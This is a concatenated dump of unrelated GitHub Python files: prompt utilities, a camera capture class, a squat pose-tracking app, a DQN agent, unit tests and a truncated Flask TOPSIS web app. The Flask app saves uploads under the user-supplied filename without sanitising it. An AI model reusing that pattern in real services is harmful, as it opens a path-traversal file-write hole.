raise\n","repo_name":"spyder-ide/spyder","sub_path":"external-deps/spyder-kernels/spyder_kernels/console/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":7851,"dataset":"github-code","pt":"44"} +{"seq_id":"40096342109","text":"import os\nfrom glob import glob\n\n\ndef prepare_cps(prompt_dir, categories, use_txt_prompts: bool):\n if categories is None and use_txt_prompts:\n categories = [\n prompt_pth.split(\"/\")[-1].replace(\".txt\", \"\")\n for prompt_pth in sorted(list(glob(f\"{prompt_dir}/*.txt\")))\n ]\n elif categories is None and not use_txt_prompts:\n categories = [\n prompt_dir.split(\"/\")[-1]\n for prompt_dir in sorted(list(glob(f\"{prompt_dir}/*\")))\n ]\n else:\n pass\n\n # final cps to return\n final_cps = []\n\n # load category-prompt pairs\n for category in categories:\n if not use_txt_prompts:\n cps = [tuple(prompt_pth.split(\"/\")[-2:]) \n for prompt_pth \n in list(glob(f\"{prompt_dir}/{category}/*\"))]\n else:\n txt_pth = f\"{prompt_dir}/{category}.txt\"\n with open(txt_pth, \"r\") as f:\n cps = [\n tuple(\n [os.path.splitext(os.path.basename(txt_pth))[0], \n line.strip()]\n ) for line in f.read().split(\"\\n\")\n ]\n\n # remove empty string\n cps = [tuple([category, prompt]) \n for category, prompt in cps\n if len(prompt) > 0\n ]\n # remove prompt starting with #\n cps = [tuple([category, prompt]) \n for category, prompt in cps\n if prompt[0] != \"#\"\n ]\n # remove . 
in end\n cps = [tuple([category, prompt[:-1]]) if prompt[-1] == \".\" \n else tuple([category, prompt]) \n for category, prompt in cps]\n # remove duplicates\n cps = sorted(list(set(cps)))\n # append to final_cps\n final_cps += cps\n \n return final_cps\n\n\ndef prepare_augdict(cps, augmentation_path, verbose):\n with open(augmentation_path, \"r\") as f:\n # read augmentations\n augprompts = [line.strip() for line in f.read().split(\"\\n\") if line.strip() != \"\"]\n augprompts = [line.strip() for line in augprompts if line.strip()[0] != \"#\"]\n # header starts with \"AUGPROMPT_COMMON\": use augmentations for all prompts\n if augprompts[0] == \"AUGPROMPT_COMMON\":\n if verbose:\n print(\"Using Common Augprompts over All Prompts...\")\n augprompts = augprompts[1:]\n tmp = dict()\n for cp in cps:\n tmp[cp] = augprompts\n augdict = tmp\n # header starts with \"AUGPROMPT_PER_PROMPT\": augmentations specified for each prompt \n elif augprompts[0] == \"AUGPROMPT_PER_PROMPT\":\n if verbose:\n print(\"Using Prompt-specific Augprompts...\")\n augprompts = augprompts[1:]\n tmp = dict()\n current_category = \"\"\n current_prompt = \"\"\n for line in augprompts:\n if line[:12] == \"category:\":\n current_category = line.replace(\"category:\", \"\").strip()\n elif line[:7] == \"PROMPT:\":\n current_prompt = line.replace(\"PROMPT:\", \"\").strip()\n assert (current_category, current_prompt) not in tmp.keys(), f\"Duplicate prompt in {augmentation_path} file\"\n assert (current_category, current_prompt) in cps, f\"In {augmentation_path}, there are invalid prompts.\"\n tmp[(current_category, current_prompt)] = []\n elif current_category == \"\" or current_prompt == \"\":\n continue\n else:\n tmp[(current_category, current_prompt)].append(line.strip())\n augdict = tmp\n\n # invalid header => raise error \n else:\n assert False, \"Augprompt-header must be specified.\"\n \n # sort augdict\n augdict = dict(sorted(augdict.items()))\n assert tuple(sorted(list(augdict.keys()))) == tuple(sorted(cps)), f\"Mismatch in augprompt file: '{augmentation_path}' & cps we are to use: {cps}\"\n\n return augdict\n\n\ndef prepare_cps_from_dirs(args, image_dir, use_filter_setting=False):\n # Categories. 
If None, type them in.\n if args.categories is None:\n categories = [\"*\"] # all\n else:\n assert type(args.categories) == list\n categories = args.categories\n\n # Parse Categories.\n if type(categories) == str:\n categories = [category.strip() for category in categories.split(\",\")]\n else:\n assert type(categories) == list\n\n # To Save cps.\n cps = []\n\n # If using setting (usually After Filtering)\n if use_filter_setting:\n for category in categories:\n cps += [\n # modified for \"settings\" input\n tuple([prompt_pth.split(\"/\")[-3],prompt_pth.split(\"/\")[-1]]) \n for prompt_pth in list(glob(f\"{image_dir}/*/{category}/settings:*/*\"))\n ]\n # If not using setting (usually Before Filtering)\n else:\n for category in categories:\n cps += [\n tuple(prompt_pth.split(\"/\")[-2:]) \n for prompt_pth in list(glob(f\"{image_dir}/*/{category}/*\"))\n ]\n\n # Remove duplicate, and sort\n cps = sorted(list(set(cps)))\n \n # Filter the prompts.\n if 'prompts' not in vars(args).keys():\n pass\n elif args.prompts is not None:\n _cps = []\n for prompt_type, prompt in cps:\n if prompt in args.prompts:\n _cps += [(prompt_type, prompt)]\n cps = _cps\n # print that filtering with 'args.prompts' has happend\n if args.verbose:\n print(f\"Additionally filtered category-prompt pairs sicne '--prompts' is provided: Using {len(cps)} number of cps\\n\")\n\n # print total number of (category, prompt) pairs\n if args.verbose:\n print(f\"Running for {len(cps)} number of prompts\\n\\n\") \n\n return cps\n\n\ndef get_unique_categories(cps):\n # list to save all categories\n all_categories = []\n\n # iterate for all category-prompt pairs\n for category_, prompt_ in cps: \n all_categories.append(category_)\n\n # remove duplicates to retrieve unique categories\n unique_categories = sorted(list(set(all_categories)))\n\n return unique_categories\n\n\ndef get_cps_for_given_category(cps, category):\n # list to save prompts for given category \n filtered_prompts = []\n\n # iterate for all category-prompt pairs\n for category_, prompt_ in cps:\n if category_ == category:\n filtered_prompts.append((category_, prompt_))\n \n # remove duplicates to retrieve cps for given category\n filtered_prompts = sorted(list(set(filtered_prompts)))\n return filtered_prompts","repo_name":"jellyheadandrew/CHORUS","sub_path":"utils/prepare_prompts.py","file_name":"prepare_prompts.py","file_ext":"py","file_size_in_byte":6765,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"44"} +{"seq_id":"20120907823","text":"__author__ = \"Nitin Dutt\"\n\nimport cv2\nimport datetime\nimport time\nimport os\n\nVIDEO_INDEX = 0 #this is based on /ls/video<index number on host machine>\nclass ExternalCamera(object):\n def opencv_take_screenshot(self, width = 1280, height = 1024):\n cam = cv2.VideoCapture(VIDEO_INDEX)\n cam.set(3, width)\n cam.set(4, height)\n cam.set(15, 0.1)\n cv2.namedWindow(\"test\")\n\n ret, frame = cam.read()\n cv2.imshow(\"test\", frame)\n\n if not ret:\n return False\n\n k = cv2.waitKey(3)\n\n date = datetime.datetime.now().strftime(\"%m_%d_%Y_%H_%M_%S\")\n img_name = \"opencv_frame_{}.png\".format(date)\n cv2.imwrite(img_name, frame)\n cv2.imwrite(img_name, frame)\n print(\"{} written!\".format(img_name))\n\n cv2.destroyAllWindows()\n cam.release()\n\n\n def opencv_take_video(self, min = .5, width = 1280, height = 1024):\n timeout = time.time() + 60*min\n\n cam = cv2.VideoCapture(VIDEO_INDEX)\n cam.set(3, width)\n cam.set(4, height)\n cam.set(15, 0.1)\n #for opencv 2.4.8\n #fourcc = 
cv2.cv.CV_FOURCC(*'XVID')\n #for opencv 3.4 and above\n\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n\n date = datetime.datetime.now().strftime(\"%m_%d_%Y_%H_%M_%S\")\n video_file_name = \"opencv_video_{}.avi\".format(date)\n\n # out = cv2.VideoWriter('output.avi', fourcc, 20.0, (1280,1024))\n out = cv2.VideoWriter(video_file_name, fourcc, 20.0, (int(cam.get(3)), int(cam.get(4))))\n\n while (cam.isOpened()):\n ret, frame = cam.read()\n if ret == True:\n # frame = cv2.flip(frame, 0)\n out.write(frame)\n cv2.imshow('frame', frame)\n if cv2.waitKey(1) & int(time.time()) > timeout:\n break\n else:\n return False\n\n cam.release()\n out.release()\n cv2.destroyAllWindows()\n return video_file_name\n\n\n\n def FrameCaptureFromVideo(self, path): \n # Path to video file\n vidObj = cv2.VideoCapture(path)\n\t \n # Used as counter variable\n count = 0\n extractFramedir = os.path.join(os.getcwd(), datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S'))\n os.makedirs(extractFramedir)\n # checks whether frames were extracted\n success = 1\n\n while success:\n # vidObj object calls read\n # function extract frames\n success, image = vidObj.read()\n\n # Saves the frames with frame-count\n cv2.imwrite(extractFramedir + \"/\" + \"frame%d.jpg\" % count, image)\n count += 1\n \n\n\n\n","repo_name":"nitindutt/machine_learning_based_text_reader_from_image","sub_path":"ExternalCamera.py","file_name":"ExternalCamera.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"19924736796","text":"import pickle\n\nimport cv2 as cv\nimport argparse\nfrom FullBody import Body, BODY_PARTS_LIST\nimport utils\nimport mediapipe as mp\nfrom model_network import *\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--input', default=0, help='Path to image or video. 
Skip to capture frames from camera')\nparser.add_argument('--display_width', default=1280, type=int, help='Resize input to specific width.')\nparser.add_argument('--display_height', default=920, type=int, help='Resize input to specific height.')\nparser.add_argument('--save', default=False, type=bool, help='Save the video output')\nparser.add_argument('--data_set_mode', default=False, type=bool, help='Mark true to create a dataset.')\nparser.add_argument('--output_data', default=False, type=bool, help='Mark true to create a run_dir.')\n\nINSTRUCTIONS_COLOR = (0, 0, 0)\nCOUNTER_COLOR = (0, 0, 0)\nEXIT_COLOR = (0, 0, 255)\nON_LINE_COLOR = (255, 0, 0)\nOFF_LINE_COLOR = (0, 0, 255)\nlast_squat_predict = None\npredict_mistake = None\n\nargs = parser.parse_args() # Load arguments\ndata_set_mode = args.data_set_mode # Create mode for a data set\noutput_data = args.output_data # Flag to indicate if data should be outputed\nmodel_knn_2_d = 'models/model_number_0_2d_knn.pickle' # Trained KNN 2d model\nmodel_net_3_d = 'models/model_number_0_3d_net.pickle' # Trained net 3d model\nmodel_knn_multi_2_d = 'models/model_number_multi_0_3d_knn.pickle' # Trained knn for multi classification\nif output_data:\n run_dir = utils.create_run_dir()\nelse:\n run_dir = None\nif data_set_mode:\n data_types = ['good', 'high_waste', 'knee_collapse', 'lifting_heels']\n type_index = 0\n sample_count = {'good': 30, 'high_waste': 10, 'knee_collapse': 10,\n 'lifting_heels': 10} # How many samples should the system capture\n user_body = Body(run_dir, data_types[0]) # Create a Body object\nelse:\n user_body = Body(run_dir)\ndisplay_width = args.display_width\ndisplay_height = args.display_height\nmpPose = mp.solutions.pose\npose = mpPose.Pose()\nmpDraw = mp.solutions.drawing_utils\nmodel_net, model_knn, model_multi = utils.load_models([model_net_3_d, model_knn_2_d, model_knn_multi_2_d])\n\ncap = cv.VideoCapture(args.input if args.input else 0)\noutput = None\nif args.save:\n fourcc = cv.VideoWriter_fourcc(*'MP4V')\n output = cv.VideoWriter('training_example.mp4', fourcc, 15.0, (display_width, display_height))\nframe_counter = 0\nstanding_line_points = None\ncalibrate_dur = 5\nfps = 15\ncalibrate_frames = calibrate_dur * fps\nsquat_count = 0\n\n\ndef draw_standing_line(frame, standing_line):\n \"\"\"\n Draw the standing line on frame\n :param frame: Frame to draw on\n :param standing_line: Standing line coordinates\n \"\"\"\n if standing_line:\n if user_body.on_standing_line():\n cv.line(frame, standing_line[0], standing_line[1], ON_LINE_COLOR, 2)\n else:\n cv.line(frame, standing_line[0], standing_line[1], OFF_LINE_COLOR, 2)\n\n\ndef insert_instructions(frame, txt):\n \"\"\"\n Insert a user instruction on the top of the frame\n :param frame: Frame to insert on\n :param txt: Instruction to insert\n \"\"\"\n cv.putText(frame, txt, (10, 20), cv.FONT_HERSHEY_SIMPLEX, 0.5, INSTRUCTIONS_COLOR, 2)\n\n\ndef insert_squat_count(frame):\n \"\"\"\n Insert the squat count on the frame\n :param frame: Frame to insert on\n \"\"\"\n global squat_count\n height = frame.shape[0]\n cv.putText(frame, \"Squat count: {}\".format(squat_count), (10, height - 20), cv.FONT_HERSHEY_SIMPLEX, 0.5,\n COUNTER_COLOR, 1)\n\n\ndef show_img(frame, save_frame=True):\n \"\"\"\n Present the frame to the user and save the frame if got save_frame\n :param frame: Frame to present\n :param save_frame: Flag to save the frame\n \"\"\"\n global frame_counter, data_types, type_index\n width, height = frame.shape[1], frame.shape[0]\n cv.putText(frame, 'To quit press q', 
(width - 150, height - 10), cv.FONT_HERSHEY_SIMPLEX, 0.5, EXIT_COLOR, 2)\n if data_set_mode:\n cv.putText(frame, 'Perform type: {} - {} To go'.format(data_types[type_index],\n sample_count[data_types[type_index]] - squat_count),\n (10, 40), cv.FONT_HERSHEY_SIMPLEX, 0.5, INSTRUCTIONS_COLOR, 2)\n resized = cv.resize(frame, (display_width, display_height))\n cv.imshow('OpenPose using OpenCV', resized)\n if save_frame:\n file_name = f'{run_dir}/img_samples/img_frame={frame_counter}.jpg'\n cv.imwrite(file_name, frame)\n if output:\n output.write(resized)\n\n\ndef get_points(frame):\n \"\"\"\n Get the body points from the CV Network\n :param frame: Frame to detect\n :return: The points of the body parts\n \"\"\"\n points = None\n global standing_line_points\n imgRGB = cv.cvtColor(frame, cv.COLOR_BGR2RGB)\n results = pose.process(imgRGB) # Process img\n if results.pose_landmarks:\n points = list()\n for id, lm in enumerate(results.pose_landmarks.landmark):\n h, w, c = frame.shape\n cx, cy = int(lm.x * w), int(lm.y * h)\n points.append((cx, cy))\n if not standing_line_points:\n standing_line_points = utils.get_standing_line(w, h, 0.07, 0.35)\n user_body.set_standing_line(standing_line_points, (w, h))\n return points, results\n\n\ndef calibrate_mode(frame, points, results):\n \"\"\"\n Runs on calibrate mode is responsible to calibrate the Body object\n :param frame: Current frame detected\n :param points: Points detected\n :param results: Reguarding the points detected\n \"\"\"\n global calibrate_frames, frame_counter\n user_body.calibrate_class(points, frame_counter)\n draw_standing_line(frame, standing_line_points)\n if user_body.is_ready() and calibrate_frames != 0:\n mpDraw.draw_landmarks(frame, results.pose_landmarks, mpPose.POSE_CONNECTIONS)\n insert_instructions(frame, 'Calibrating.. stand still. frames left to start: {}'.format(calibrate_frames))\n calibrate_frames -= 1\n elif not user_body.is_ready():\n calibrate_frames = calibrate_dur * fps\n insert_instructions(frame, 'Calibrating.. place your heels on the red line. frames left to start: '\n '{}'.format(calibrate_frames))\n elif user_body.is_ready() and calibrate_frames == 0:\n mpDraw.draw_landmarks(frame, results.pose_landmarks, mpPose.POSE_CONNECTIONS)\n insert_instructions(frame, 'Finished calibrating! start squatting.')\n user_body.calibrate_mode = False\n user_body.sample_squat_mode = True\n show_img(frame, save_frame=False)\n\n\ndef sample_squat(frame, points, results):\n \"\"\"\n Runs the sample squat stage, initializes the squat on the Body class\n :param frame: Frame detected\n :param points: Points detected\n \"\"\"\n global frame_counter\n instruction = user_body.check_body_points(points, frame_counter)\n if user_body.got_valid_points():\n if not user_body.init_squat_ref():\n insert_instructions(frame, 'Now lets sample a reference squat. Start a squat')\n mpDraw.draw_landmarks(frame, results.pose_landmarks, mpPose.POSE_CONNECTIONS)\n else:\n insert_instructions(frame, 'Finished sampling. 
You can start squatting!')\n user_body.sample_squat_mode = False\n else:\n insert_instructions(frame, instruction)\n draw_standing_line(frame, standing_line_points)\n show_img(frame, save_frame=False)\n\n\ndef get_multi_predict():\n pass\n\n\ndef run(frame, points, results):\n global frame_counter, squat_count, last_squat_predict, predict_mistake\n instruction = user_body.check_body_points(points, frame_counter)\n draw_standing_line(frame, standing_line_points)\n if user_body.got_valid_points():\n if last_squat_predict is not None:\n if predict_mistake is not None and last_squat_predict == 0:\n insert_instructions(frame, 'Squat {}: knn {}'.format(squat_count, utils.MULTI_LABELS[predict_mistake]))\n else:\n insert_instructions(frame, 'Squat {}: knn {}'.format(squat_count, 'Good Job!'))\n else:\n insert_instructions(frame, 'Squat!')\n insert_squat_count(frame)\n if user_body.squat():\n centered, three_d = user_body.get_squat()\n if not data_set_mode:\n last_squat_predict = get_knn_squat_predict(model_knn, centered)\n if last_squat_predict == 0:\n predict_mistake = get_knn_squat_predict(model_multi, centered)\n else:\n predict_mistake = None\n squat_count += 1\n mpDraw.draw_landmarks(frame, results.pose_landmarks, mpPose.POSE_CONNECTIONS)\n if data_set_mode:\n show_img(frame, save_frame=False)\n else:\n show_img(frame, save_frame=True)\n else:\n insert_instructions(frame, instruction)\n insert_squat_count(frame)\n show_img(frame, save_frame=False)\n\n\ndef get_knn_squat_predict(knn, centered):\n centered = utils.convert_list_to_np(centered)\n indices_2d = utils.find_slicing_indices(int(knn.get_dim() / 30), utils.find_min_y_index(centered)[0],\n len(centered))\n data_knn = centered[indices_2d]\n predict_knn = knn.predict(data_knn.reshape(1, knn.get_dim()))\n return predict_knn[0]\n\n\ndef get_squat_predict():\n global model_knn, model_net\n centered, three_d = user_body.get_squat()\n three_d = utils.convert_list_to_np(three_d)\n centered = utils.convert_list_to_np(centered)\n indices_3d = utils.find_slicing_indices(int(model_net.get_dim() / 45), utils.find_min_y_index(three_d)[0],\n len(three_d))\n indices_2d = utils.find_slicing_indices(int(model_knn.get_dim() / 30), utils.find_min_y_index(centered)[0],\n len(centered))\n data_knn = centered[indices_2d]\n data_net = three_d[indices_3d]\n predict_knn = model_knn.predict(data_knn.reshape(1, model_knn.get_dim()))\n data_test_manager = DataManager(torch.tensor([data_net]), torch.tensor([1]))\n data_net_it = data_test_manager.get_data_iterator()\n for data in data_net_it:\n input, label = data\n predict_net = model_net.predict(input.float())\n # predict_net = [None]\n return predict_net[0].item(), predict_knn[0]\n\n\ndef data_set_creator(frame, points, results):\n global data_types, type_index, squat_count, sample_count, cap\n if squat_count == sample_count[data_types[type_index]]:\n cap.release()\n cv.destroyAllWindows()\n print('Saving info for type {}'.format(data_types[type_index]))\n user_body.output_data_set_points()\n type_index += 1\n if type_index >= len(data_types):\n return False\n else:\n user_body.training_dir = data_types[type_index]\n user_body.calibrate_mode = True\n squat_count = 0\n cap = cv.VideoCapture(args.input if args.input else 0)\n return True\n run(frame, points, results)\n return True\n\n\nif __name__ == '__main__':\n while cv.waitKey(1) < 0:\n hasFrame, frame = cap.read()\n frame_counter += 1\n if not hasFrame:\n cv.waitKey()\n break\n points, results = get_points(frame)\n if not points:\n continue\n if 
user_body.calibrate_mode:\n calibrate_mode(frame, points, results)\n elif user_body.sample_squat_mode:\n sample_squat(frame, points, results)\n else:\n if data_set_mode:\n if not data_set_creator(frame, points, results):\n break\n else:\n continue\n else:\n run(frame, points, results)\n if output:\n output.release()\n cap.release()\n cv.destroyAllWindows()\n if not data_set_mode and run_dir:\n print('Outputting data...')\n user_body.output_points()\n","repo_name":"romc57/EngineeringFinalProject","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"26373976829","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\nimport torch as T\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\n\nimport numpy as np\nimport math\nimport config\n\nfrom dqn_network_model import DeepQNetwork_cnn\n\nT.manual_seed(999)\n# from torch.utils.tensorboard import SummaryWriter\n# from tensorboardX import SummaryWriter\n# writer = SummaryWriter()\n\nclass Agent:\n def __init__(self, gamma, epsilon, lr, input_dims, batch_size, \n n_actions, c_step=300,\n max_mem_size=2000, eps_end=0.01, eps_dec=20000, start_eps_dec=1000):\n self.gamma = gamma\n self.epsilon = epsilon\n self.eps_max = epsilon\n self.eps_min = eps_end\n self.eps_dec = eps_dec\n self.start_eps_dec = start_eps_dec\n\n self.action_space = [i for i in range(n_actions)]\n self.mem_size = max_mem_size\n self.batch_size = batch_size\n self.c_step = c_step\n self.lr = lr\n\n self.mem_cntr = 0\n self.learn_cntr = 0\n self.loss_his = []\n\n self.device = T.device('cuda:0' if T.cuda.is_available() else 'cpu')\n\n self.q_eval = DeepQNetwork_cnn(self.lr,\n n_actions=n_actions, input_dims=input_dims,\n fc1_dims=256,\n fc2_dims=32).to(self.device)\n\n self.q_target = DeepQNetwork_cnn(self.lr,\n n_actions=n_actions,input_dims=input_dims,\n fc1_dims=256,\n fc2_dims=32).to(self.device)\n\n self.q_target.load_state_dict(self.q_eval.state_dict())\n self.q_target.eval()\n\n # transition: [s, a, r, s_, done]\n self.state_memory = np.zeros((self.mem_size, 1, *input_dims), dtype=np.float32)\n self.state2_memory = np.zeros((self.mem_size, 7) , dtype=np.int32)\n self.action_memory = np.zeros(self.mem_size , dtype=np.int32)\n self.reward_memory = np.zeros(self.mem_size , dtype=np.float32)\n self.new_state_memory = np.zeros((self.mem_size, 1, *input_dims), dtype=np.float32)\n self.new_state2_memory = np.zeros((self.mem_size, 7) , dtype=np.int32)\n self.terminal_memory = np.zeros(self.mem_size , dtype=np.bool)\n\n def store_transition(self, state, action, reward, state_, done):\n idx = self.mem_cntr % self.mem_size\n self.state_memory[idx] = state[0]\n self.state2_memory[idx] = state[1]\n self.action_memory[idx] = action\n self.reward_memory[idx] = reward\n self.new_state_memory[idx] = state_[0]\n self.new_state2_memory[idx] = state_[1]\n self.terminal_memory[idx] = done\n\n self.mem_cntr += 1\n\n @T.no_grad()\n def choose_action(self, observation):\n if np.random.random() > self.epsilon:\n self.q_eval.eval()\n state = T.tensor([observation[0]]).to(self.q_eval.device)\n state2 = T.tensor([observation[1]]).to(self.q_eval.device)\n actions = self.q_eval([state, state2], excution=True)\n action = T.argmax(actions).item()\n ####################################\n # print(\"*********************\")\n # print(actions, action)\n # print(\"*********************\")\n ####################################\n 
else:\n action = np.random.choice(self.action_space)\n\n return action\n\n def learn(self):\n loss = None\n\n if self.mem_cntr >= self.batch_size:\n\n max_mem = min(self.mem_cntr, self.mem_size)\n batch = np.random.choice(max_mem, self.batch_size, replace=False)\n batch_idx = np.arange(self.batch_size, dtype=np.int32)\n\n state_batch = T.tensor(self.state_memory[batch]).to(self.q_eval.device)\n state2_batch = T.tensor(self.state2_memory[batch]).to(self.q_eval.device)\n reward_batch = T.tensor(self.reward_memory[batch]).to(self.q_eval.device)\n new_state_batch = T.tensor(self.new_state_memory[batch]).to(self.q_eval.device)\n new_state2_batch = T.tensor(self.new_state2_memory[batch]).to(self.q_eval.device)\n terminal_batch = T.tensor(self.terminal_memory[batch]).to(self.q_eval.device)\n action_batch = self.action_memory[batch]\n\n self.q_eval.train()\n q_eval = self.q_eval.forward([state_batch, state2_batch])[batch_idx, action_batch]\n # q_eval = q_eval[action_batch]\n\n with T.no_grad():\n self.q_target.eval()\n q_next = self.q_target.forward([new_state_batch, new_state2_batch])\n\n q_next[terminal_batch] = 0.\n q_target = reward_batch + self.gamma * T.max(q_next, dim=1)[0]\n\n # caculate the loss between q target and q eval\n loss = self.q_eval.loss(q_eval, q_target)\n self.loss_his.append(loss)\n\n # update the evaluation q network\n self.q_eval.optimizer.zero_grad()\n loss.backward()\n # for param in self.q_eval.parameters():\n # param.grad.data.clamp_(-1, 1)\n if config.clip:\n nn.utils.clip_grad_norm_(self.q_eval.parameters(), config.clip)\n\n # tot_norm = 0; cntr = 0\n # for parm in self.q_eval.parameters():\n # grad_norm = parm.grad.data.norm().item()\n # tot_norm += grad_norm\n # cntr += 1\n # print(\"[{}] \".format(cntr), grad_norm)\n # print(\"avg. : \", tot_norm / cntr)\n\n\n self.q_eval.optimizer.step()\n\n # epsilon decay\n if self.epsilon >= self.eps_min:\n if self.learn_cntr < self.start_eps_dec:\n self.epsilon = self.eps_max\n else:\n self.epsilon = self.eps_min + (self.eps_max - self.eps_min) *\\\n math.exp(-1. 
* (self.learn_cntr-self.start_eps_dec) / self.eps_dec)\n else:\n self.epsilon = self.eps_min\n\n self.learn_cntr += 1\n\n # replace targent network very c steps\n if self.learn_cntr % self.c_step == 0:\n self.q_target.load_state_dict(self.q_eval.state_dict())\n\n return loss\n","repo_name":"colinlee0924/drl-path-planning","sub_path":"dqn_go2pods_oneChannel.py","file_name":"dqn_go2pods_oneChannel.py","file_ext":"py","file_size_in_byte":6503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"8335428631","text":"import unittest\n\nfrom game import MoveNotAllowedError, GameInitiationError\nfrom nlg import NLGame\nfrom sentence_classifier.sentence_classifier import SentenceClassifier\nfrom traveling_tourist import TravelingTourist\nfrom helper_functions import _assert_almost_equel\n\nclass TestNLG(unittest.TestCase):\n def setUp(self):\n pass\n\n def test_game_initiation(self):\n test_sets = [\n {\n \"possible_moves\": [\"my\", \"name\", \"is\",\"was\", \"not\", \"john\", \"michael\"],\n \"starting_word\": \"my\",\n \"current_game_state\": [\"my\", \"name\"],\n \"expect_raise\": False\n },\n {\n \"possible_moves\": [\"my\", \"name\", \"is\", \"was\", \"not\", \"john\", \"michael\"],\n \"starting_word\": \"my\",\n \"current_game_state\": [\"name\"],\n \"expect_raise\": True\n },\n {\n \"possible_moves\": [\"my\", \"name\", \"is\", \"was\", \"not\", \"john\", \"michael\"],\n \"starting_word\": \"my\",\n \"current_game_state\": [],\n \"expect_raise\": True\n },\n {\n \"possible_moves\": [\"my\", \"name\", \"is\", \"was\", \"not\", \"john\", \"michael\"],\n \"starting_word\": \"\",\n \"current_game_state\": [\"my\"],\n \"expect_raise\": True\n }\n ]\n for game in test_sets:\n print(game)\n if game[\"expect_raise\"]:\n with self.assertRaises(GameInitiationError):\n self.t = NLGame(\n vocabulary=game[\"possible_moves\"],\n starting_word=game[\"starting_word\"],\n current_game_state=game[\"current_game_state\"]\n )\n else:\n self.t = NLGame(\n vocabulary=game[\"possible_moves\"],\n starting_word=game[\"starting_word\"],\n current_game_state=game[\"current_game_state\"]\n )\n \n \n def test_check_moves(self):\n test_sets = [\n {\n \"possible_moves\": [\"my\", \"name\", \"is\",\"was\", \"not\", \"john\", \"michael\"],\n \"starting_word\": \"my\",\n \"current_game_state\": [\"my\", \"name\"],\n \"test_possible\":[\"is\", \"john\"],\n \"test_impossible\": [\"slkdfj\", \"\"]\n }\n ]\n for test_set in test_sets:\n self.t = NLGame(\n vocabulary=test_set[\"possible_moves\"],\n starting_word=test_set[\"starting_word\"],\n current_game_state=test_set[\"current_game_state\"]\n )\n for not_allowed in test_set[\"test_impossible\"]:\n self.assertFalse(self.t._check_move_possible(not_allowed))\n\n for allowed in test_set[\"test_possible\"]:\n self.assertTrue(self.t._check_move_possible(allowed))\n self.tearDown()\n\nclass TestSentenceClassifier(unittest.TestCase):\n def setUp(self):\n self.sentence_classifier =SentenceClassifier()\n\n def test_accept(self):\n human = [\"my name is michael\", \"my name is michael\"]\n not_human = [\"my name name name\", \"john my michael name\"]\n for sentence in human:\n self.assertTrue(self.sentence_classifier.sentence_is_human(sentence.split()))\n","repo_name":"JeromeBau/mcts","sub_path":"test/test_nlg.py","file_name":"test_nlg.py","file_ext":"py","file_size_in_byte":3367,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"11997618929","text":"from pathlib import 
Path\n\nfrom flask import Flask, render_template, request\nimport pandas as pd\nimport smtplib\n\napp = Flask(__name__)\n\n\ndef vector_normalize(dataset, ncol, df):\n for i in range(1, ncol):\n y = 0\n for j in range(len(dataset)):\n print(df.iloc[j, i])\n y = y + df.iloc[j, i] ** 2\n y = y ** 0.5\n for j in range(len(df)):\n dataset.iat[j, i] = (dataset.iloc[j, i] / y)\n return dataset\n\n\n\"\"\"**Step 3:Weight Assignment**\"\"\"\n\n\ndef weight(df, ncol, weights):\n weights = list(map(int, weights.split(',')))\n print(weights)\n for i in range(1, ncol):\n for j in range(len(df)):\n df.iat[j, i] = df.iloc[j, i] * weights[i - 1]\n return df\n\n\n\"\"\"**Step 4:Finding ideal best and ideal worst**\"\"\"\n\n\ndef Calc_ideal_Values(df, nCol, impact):\n # calculating ideal best and ideal worst\n ideal_positive_value = (df.max().values)[\n 1:] # positive value i.e if impact is + then maximum will be our ideal positive value\n ideal_negative_value = (df.min().values)[\n 1:] # negative value i.e if impact is + then minimum will be our ideal negative value\n # now we need to check when our impact is negative\n # now we will run our loop from 1 to last column and check if our impact is negative or not if it is then we need to interchange the ideal postive and ideal negative\n\n for i in range(1, nCol):\n if impact[i - 1] == '-':\n ideal_positive_value[i - 1], ideal_negative_value[i - 1] = ideal_negative_value[i - 1], \\\n ideal_positive_value[i - 1]\n return ideal_positive_value, ideal_negative_value\n\n\n\"\"\"**Step 5:Calculate Euclidean Distance ,score and Rank**\"\"\"\n\nimport math\n\n\ndef euclidean_distance(dataset, ncol, weights, impact, df1):\n # first of all normalize the vector\n dataset = vector_normalize(dataset, ncol, df1)\n # second:weight assignment\n dataset1 = weight(dataset, ncol, weights)\n\n # ideal postive and ideal negtaive values calculation\n ideal_p, ideal_n = Calc_ideal_Values(dataset1, ncol, impact)\n\n # calculating the euclidean distance\n perf_score = []\n for i in range(len(dataset1)):\n s_positive, s_negative = 0.0, 0.0\n for j in range(1, ncol):\n s_positive = s_positive + (ideal_p[j - 1] - dataset1.iloc[i, j]) ** 2\n s_negative = s_negative + (ideal_n[j - 1] - dataset1.iloc[i, j]) ** 2\n\n s_positive = math.sqrt(s_positive)\n s_negative = math.sqrt(s_negative)\n\n perf_score.append(s_negative / (s_negative + s_positive))\n # print(perf_score)\n # Score\n df1['Topsis Score'] = perf_score\n # #Rank\n df1['Rank'] = (df1['Topsis Score'].rank(method='max', ascending=False))\n df1 = df1.astype({\"Rank\": int})\n\n df1.to_csv('102003466-result.csv', index=False)\n return df1\n\n\nimport sys\nimport os\n\n\n# dataset, ncol, weights, impact, df1\n# def main():\n# euclidean_distance(data1, len(data1.columns), weights, impact, data)\n\n\n@app.route('/')\ndef hello_world(): # put application's code here\n return render_template('index.html')\n\n\n@app.route('/topics', methods=['POST'])\ndef topics(): # put application's code here\n res = request.values.to_dict()\n file = request.files['file']\n file.save(file.filename)\n print(file.name)\n ex_df = pd.read_excel(os.path.abspath(file.filename), engine='openpyxl',\n )\n print(os.path.abspath(file.filename))\n ex_df.to_csv(f'{Path(file.filename).stem}.csv')\n 